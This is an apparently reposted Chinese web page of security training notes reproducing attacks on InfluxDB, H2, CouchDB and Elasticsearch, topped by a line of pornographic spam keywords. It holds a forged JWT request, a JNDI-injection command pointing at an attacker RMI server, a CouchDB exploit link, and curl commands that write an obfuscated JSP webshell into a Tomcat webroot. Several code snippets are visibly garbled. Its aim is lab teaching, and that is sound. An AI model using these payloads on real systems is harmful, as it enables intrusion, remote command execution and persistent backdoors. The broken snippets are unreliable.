国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

網(wǎng)絡(luò)安全全棧培訓(xùn)筆記(56-服務(wù)攻防-數(shù)據(jù)庫安全&H2&Elasticsearch&CouchDB&Influxdb復(fù)現(xiàn))

這篇具有很好參考價值的文章主要介紹了網(wǎng)絡(luò)安全全棧培訓(xùn)筆記(56-服務(wù)攻防-數(shù)據(jù)庫安全&H2&Elasticsearch&CouchDB&Influxdb復(fù)現(xiàn))。希望對大家有所幫助。如果存在錯誤或未考慮完全的地方,請大家不吝賜教,您也可以點擊"舉報違法"按鈕提交疑問。

第56天 服務(wù)攻防-數(shù)據(jù)庫安全&H2&Elasticsearch&CouchDB&Influxdb復(fù)現(xiàn)

網(wǎng)絡(luò)安全全棧培訓(xùn)筆記(56-服務(wù)攻防-數(shù)據(jù)庫安全&H2&Elasticsearch&CouchDB&Influxdb復(fù)現(xiàn)),網(wǎng)絡(luò)安全全棧學(xué)習(xí)筆記,web安全,筆記,elasticsearch

知識點:

1、服務(wù)攻防數(shù)據(jù)庫類型安全
2、influxdb,.未授權(quán)訪問wt驗證
3、H2 database-未授權(quán)訪問-配置不當(dāng)
4、CouchDB-權(quán)限繞過配合RCE-漏洞
5、ElasticSearch-文件寫入&RCE-漏洞
#章節(jié)內(nèi)容:
常見服務(wù)應(yīng)用的安全測試:
1、配置不當(dāng)-未授權(quán)訪問
2、安全機(jī)制特定安全漏洞
3、安全機(jī)制弱口令爆破攻擊

#前置知識:
應(yīng)用服務(wù)安全測試流程:見圖
1、判斷服務(wù)開放情況端口掃描&組合應(yīng)用等
2、判折服務(wù)類型歸屬數(shù)據(jù)庫&文件傳輸&通訊等
3、判折服務(wù)利用方式特定漏洞&未授權(quán)&弱口令等
網(wǎng)絡(luò)安全全棧培訓(xùn)筆記(56-服務(wù)攻防-數(shù)據(jù)庫安全&H2&Elasticsearch&CouchDB&Influxdb復(fù)現(xiàn)),網(wǎng)絡(luò)安全全棧學(xué)習(xí)筆記,web安全,筆記,elasticsearch

演示案例:

Influxdb-未授權(quán)訪問-Jwt驗證不當(dāng)
H2database-未授權(quán)訪問-配置不當(dāng)
CouchDB-權(quán)限繞過配合RCE-漏洞
ElasticSearch-文件寫入&RCE-漏洞

#nfluxdb-未授權(quán)訪問-Jwt驗證不當(dāng)
默認(rèn)端?:8086,8088
influxdb是一款菩名的時序數(shù)據(jù)庫,其使用jwt作為鑒權(quán)方式。在用戶開啟了認(rèn)證,但未設(shè)
置參數(shù)shared-secret的情況下,jwt的認(rèn)證密鑰為空字符串,此時攻擊者可以偽造任意用戶
身份在influxdb中執(zhí)行SQL語句,
1、使用 https://jwt.io/ 生成一個帶有空密鑰的有效 JWT 令牌:

{
alg":"HS256",
"typ":"JWT"
}
{
"usemame":"admin",
"exp":1676346267
}

其中是管理員帳戶名稱,是令牌過期時間。您應(yīng)該設(shè)置為將來的時間以使其生效:usernameexpexp
網(wǎng)絡(luò)安全全棧培訓(xùn)筆記(56-服務(wù)攻防-數(shù)據(jù)庫安全&H2&Elasticsearch&CouchDB&Influxdb復(fù)現(xiàn)),網(wǎng)絡(luò)安全全棧學(xué)習(xí)筆記,web安全,筆記,elasticsearch
然后把這個令牌帶到請求中,并成功在服務(wù)器中執(zhí)行SQL語句:show users

POST /query HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiZXhwIjoyOTg2MzQ2MjY3fQ.LJDvEy5zvSEpA_C6pnK3JJFkUKGq9eEi8T2wdum3R_s
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 22

db=sample&q=show+users

網(wǎng)絡(luò)安全全棧培訓(xùn)筆記(56-服務(wù)攻防-數(shù)據(jù)庫安全&H2&Elasticsearch&CouchDB&Influxdb復(fù)現(xiàn)),網(wǎng)絡(luò)安全全棧學(xué)習(xí)筆記,web安全,筆記,elasticsearch
#H2 database-未授權(quán)訪問-配置不當(dāng)
默認(rèn)端口:20051
H2 database是一款Java內(nèi)存數(shù)據(jù)庫,多用于單元測試。H2 database自帶一個Web管理頁
面,在Spring開發(fā)中,如果我們設(shè)置如下選項,即可允許外部用戶訪問Wb管理頁面,且
沒有鑒權(quán):默認(rèn)端口:
spring.h2.console.enabled=true
spring.h2.console.settings.web-allow-others=true
利用這個管理頁面,我們可以進(jìn)行JND注入攻擊,進(jìn)而在目標(biāo)環(huán)境下執(zhí)行任意命令。
管理頁面默認(rèn)為。http://your-ip:8080http://your-ip:8080/h2-console/
1、下載JNDI-Injection-Exploit
https://github.com/welk1n/JNDI-Injection-Exploit
2、生成執(zhí)行RMI Payload-URL
-C執(zhí)行命令-A服務(wù)器地址
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar-C touch /tmp/success -A 47.94.236.117
網(wǎng)絡(luò)安全全棧培訓(xùn)筆記(56-服務(wù)攻防-數(shù)據(jù)庫安全&H2&Elasticsearch&CouchDB&Influxdb復(fù)現(xiàn)),網(wǎng)絡(luò)安全全棧學(xué)習(xí)筆記,web安全,筆記,elasticsearch
在攻擊機(jī)運行poc,執(zhí)行后攻擊機(jī)會監(jiān)聽8180、1099、1389端口
網(wǎng)絡(luò)安全全棧培訓(xùn)筆記(56-服務(wù)攻防-數(shù)據(jù)庫安全&H2&Elasticsearch&CouchDB&Influxdb復(fù)現(xiàn)),網(wǎng)絡(luò)安全全棧學(xué)習(xí)筆記,web安全,筆記,elasticsearch
javax.naming.InitialContext是 JNDI 工廠類名,URL 是惡意的 RMI 地址。rmi://evil:23456/BypassByEL
攻擊機(jī)的 RMI 服務(wù)器收到以下請求:
網(wǎng)絡(luò)安全全棧培訓(xùn)筆記(56-服務(wù)攻防-數(shù)據(jù)庫安全&H2&Elasticsearch&CouchDB&Influxdb復(fù)現(xiàn)),網(wǎng)絡(luò)安全全棧學(xué)習(xí)筆記,web安全,筆記,elasticsearch
touch /tmp/success已成功執(zhí)行:
網(wǎng)絡(luò)安全全棧培訓(xùn)筆記(56-服務(wù)攻防-數(shù)據(jù)庫安全&H2&Elasticsearch&CouchDB&Influxdb復(fù)現(xiàn)),網(wǎng)絡(luò)安全全棧學(xué)習(xí)筆記,web安全,筆記,elasticsearch

#CouchDB-權(quán)限繞過RCE-CVE-2017-12636
1、下載exp.py
2、修改目標(biāo)和反彈地址
3、Python3調(diào)用執(zhí)行即可
https://github.com/vulhub/vulhub/blob/master/couchdb/CVE-2017-12636/exp.py

#ElasticSearch-文件寫入&RCE漏洞
默認(rèn)端口:92009300
Elasticsearch RCE CVE-2014-3120
1、漏洞需要s中至少存在一條數(shù)據(jù),所以我們需要先創(chuàng)建一條數(shù)據(jù)

POST /website/blog/HTTP/1.1
Host:your-ip:9200
Accept:*/
Accept-Language:en
User-Agent:Mozilla/5.0 (compatible;MSIE 9.0:Windows NT 6.1;Win64:x64:Trident/5.0)
Connection:close
Content-Type:application/x-www-form-urlencoded
Content-Length:25
{
"name":"xiaodi"
}

2、直接發(fā)包觸發(fā)執(zhí)行命令

Elasticsearch文件寫入wooyun2015110216
9200一股為ElasticSearch的常用端口,此漏洞環(huán)境需要與中間件使用
1、發(fā)現(xiàn)9200端口存在elasti-search頁面,8080存在tomcat目錄
2、利用ElasticSearch寫入后門到/usr/local/tomcat/webapps/wwwroot/

curl -XPOST http://123.58.236.76:31556/yz.jsp/yz jsp/1-d'
["<%new java.io.RandomAccessFile(application.getRealPath(new String(new byte【】
{47,116,101,115,116,46,106,115,112)》,new String(new byte【】
(114,119))).write(request.getParameter(new String(new byte[(102))).getBytes();
%>"-"test"
curl -XPUT 'http://123.58.236.76:31556/snapshot/yz.jsp'-d'
"type"."fs",
"settings":{
"location":"/usr/local/tomcat/webapps/wwwroot/",
"compress":false
}
}

3.、訪問8080端口snapshot–yz jspi文件寫入代碼到test jsp中
http://123.58.236.76:31557/wwwroot/indices/yz.jsp/snapshot-yz jsp?f=success
http://123.58.236.76:31557/wwwroot/test.jsp文章來源地址http://www.zghlxwxcb.cn/news/detail-817273.html

到了這里,關(guān)于網(wǎng)絡(luò)安全全棧培訓(xùn)筆記(56-服務(wù)攻防-數(shù)據(jù)庫安全&H2&Elasticsearch&CouchDB&Influxdb復(fù)現(xiàn))的文章就介紹完了。如果您還想了解更多內(nèi)容,請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實不符,請點擊違法舉報進(jìn)行投訴反饋,一經(jīng)查實,立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費用

相關(guān)文章

  • 網(wǎng)絡(luò)安全與攻防-常見網(wǎng)絡(luò)安全攻防

    網(wǎng)絡(luò)安全與攻防-常見網(wǎng)絡(luò)安全攻防

    目錄 攻擊手段防御策略 阻斷服務(wù)攻擊(DoS) 地址解析欺騙(ARP攻擊)(Address Resolution Protocol spoofing) 跨站腳本攻擊(XSS) SQL注入 跨站請求偽造(csrf) ?HTTPS中間人攻擊 小結(jié) 阻斷服務(wù)攻擊(DoS) 阻斷服務(wù)攻擊(Denial-of service attack),想辦法將目標(biāo)網(wǎng)絡(luò)資源用盡(自己的服

    2023年04月25日
    瀏覽(26)
  • 小迪安全 第56天 服務(wù)攻防-數(shù)據(jù)庫安全&H2&Elasticsearch&CouchDB&Influxdb 復(fù)現(xiàn)

    小迪安全 第56天 服務(wù)攻防-數(shù)據(jù)庫安全&H2&Elasticsearch&CouchDB&Influxdb 復(fù)現(xiàn)

    1.端口掃描 2.報錯回顯 時序數(shù)據(jù)庫是近幾年一個新的概念,與傳統(tǒng)的Mysql關(guān)系型數(shù)據(jù)庫相比,它的最大的特點是:數(shù)據(jù)按照時間順序存儲。 舉例來說,日志數(shù)據(jù),是以時間順序存儲的,所以用時序數(shù)據(jù)庫存儲是一種很好的選擇。使用Mysql在存儲的過程中,不是對這種基于時間

    2024年02月03日
    瀏覽(20)
  • <網(wǎng)絡(luò)安全>《35 網(wǎng)絡(luò)攻防專業(yè)課<第一課 - 網(wǎng)絡(luò)攻防準(zhǔn)備>》

    <網(wǎng)絡(luò)安全>《35 網(wǎng)絡(luò)攻防專業(yè)課<第一課 - 網(wǎng)絡(luò)攻防準(zhǔn)備>》

    認(rèn)識黑客 認(rèn)識端口 常見術(shù)語與命令 網(wǎng)絡(luò)攻擊流程 VMWare虛擬環(huán)境靶機(jī)搭建 白帽黑客 是指有能力破壞電腦安全但不具惡意目的黑客。 灰帽黑客 是指對于倫理和法律態(tài)度不明的黑客。 黑帽黑客 經(jīng)常用于區(qū)別于一般(正面的)理性黑客,一個犯罪和黑客的合成詞。 黑客:Hack

    2024年02月19日
    瀏覽(26)
  • 網(wǎng)絡(luò)安全攻防:ZigBee安全

    1.?ZigBee簡介 ZigBee(又稱紫蜂協(xié)議)是基于IEEE802.15.4標(biāo)準(zhǔn)的低功耗局域網(wǎng)協(xié)議。根據(jù)國際標(biāo)準(zhǔn)規(guī)定,ZigBee技術(shù)是一種短距離、低功耗的無線通信技術(shù)。ZigBee來源于蜜蜂的八字舞,由于蜜蜂(Bee)是靠飛翔和“嗡嗡”(Zig)地抖動翅膀的“舞蹈”來與同伴傳遞花粉所在方位信息

    2024年02月05日
    瀏覽(30)
  • 網(wǎng)絡(luò)攻防演練.網(wǎng)絡(luò)安全.學(xué)習(xí)

    網(wǎng)絡(luò)安全攻防演練是指通過模擬各種網(wǎng)絡(luò)攻擊手段,來測試自身安全防御能力和應(yīng)對能力的一種演練活動。本文總結(jié)了網(wǎng)絡(luò)安全攻防演練的重要性、準(zhǔn)備工作以及演練過程中需要注意的事項。 一、網(wǎng)絡(luò)安全攻防演練的重要性 網(wǎng)絡(luò)安全攻防演練是對自身網(wǎng)絡(luò)安全現(xiàn)狀的一種全面

    2024年02月13日
    瀏覽(25)
  • 安全意識培訓(xùn):如何提高員工網(wǎng)絡(luò)安全意識?

    安全意識培訓(xùn):如何提高員工網(wǎng)絡(luò)安全意識?

    隨著網(wǎng)絡(luò)技術(shù)的不斷發(fā)展和應(yīng)用,網(wǎng)絡(luò)安全已經(jīng)成為企業(yè)必須關(guān)注和重視的問題。尤其是在今天,企業(yè)數(shù)字化轉(zhuǎn)型的大背景下,網(wǎng)絡(luò)安全問題日益凸顯。對于企業(yè)而言,員工是企業(yè)安全的第一道防線,提高員工的網(wǎng)絡(luò)安全意識已經(jīng)成為企業(yè)安全管理的關(guān)鍵所在。本文將從以下

    2024年02月12日
    瀏覽(25)
  • 網(wǎng)絡(luò)安全應(yīng)急響應(yīng)預(yù)案培訓(xùn)

    應(yīng)急響應(yīng)預(yù)案的培訓(xùn)是為了更好地應(yīng)對網(wǎng)絡(luò)突發(fā)狀況,實施演 練計劃所做的每一項工作,其培訓(xùn)過程主要針對應(yīng)急預(yù)案涉及的相 關(guān)內(nèi)容進(jìn)行培訓(xùn)學(xué)習(xí)。做好應(yīng)急預(yù)案的培訓(xùn)工作能使各級人員明確 自身職責(zé),是做好應(yīng)急響應(yīng)工作的基礎(chǔ)與前提。應(yīng)急響應(yīng)預(yù)案的培 訓(xùn)分為以下幾

    2024年02月11日
    瀏覽(34)
  • 【網(wǎng)絡(luò)安全】-- 網(wǎng)絡(luò)滲透技術(shù)攻防(--更新中)

    1.1.1 什么是網(wǎng)絡(luò)滲透攻擊 “網(wǎng)絡(luò)滲透攻擊”是對大型的網(wǎng)絡(luò)主機(jī)服務(wù)器群組采用的一種迂回漸進(jìn)式的攻擊方法,通過長期而有計劃的逐步滲透攻擊進(jìn)入網(wǎng)絡(luò),最終控制整個網(wǎng)絡(luò)。 1.1.2 網(wǎng)絡(luò)滲透測試的意義 滲透測試是受信任的第三方進(jìn)行的一種評估網(wǎng)絡(luò)安全的活動,它通過運

    2024年02月13日
    瀏覽(23)
  • 網(wǎng)絡(luò)安全工具合計(攻防工具)

    網(wǎng)絡(luò)安全工具合計(攻防工具)

    目錄 All-Defense-Tool 免責(zé)聲明 半/全自動化利用工具 信息收集工具 資產(chǎn)發(fā)現(xiàn)工具 子域名收集工具 目錄掃描工具 指紋識別工具 端口掃描工具 Burp插件 瀏覽器插件 郵箱釣魚 社工個人信息收集類 APP/公眾號/小程序相關(guān)工具 常用小工具 漏洞利用工具 漏洞掃描框架/工具 中間件/應(yīng)用

    2024年02月13日
    瀏覽(24)
  • 網(wǎng)絡(luò)安全攻防演練項目介紹

    有很多朋友問我寫的攻防演練是什么? 本文給予回答 網(wǎng)絡(luò)安全攻防演練是公安部組織的面向稅務(wù)、電力、電信、銀行、鐵路、財政、廣電、水利、教育、互聯(lián)網(wǎng)、檢察院、法院、石油、交通等行業(yè)的政府單位/公司,開展的實戰(zhàn)攻防演練,也簡稱為護(hù)網(wǎng)。 攻防演練主要目標(biāo)是

    2024年02月09日
    瀏覽(18)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包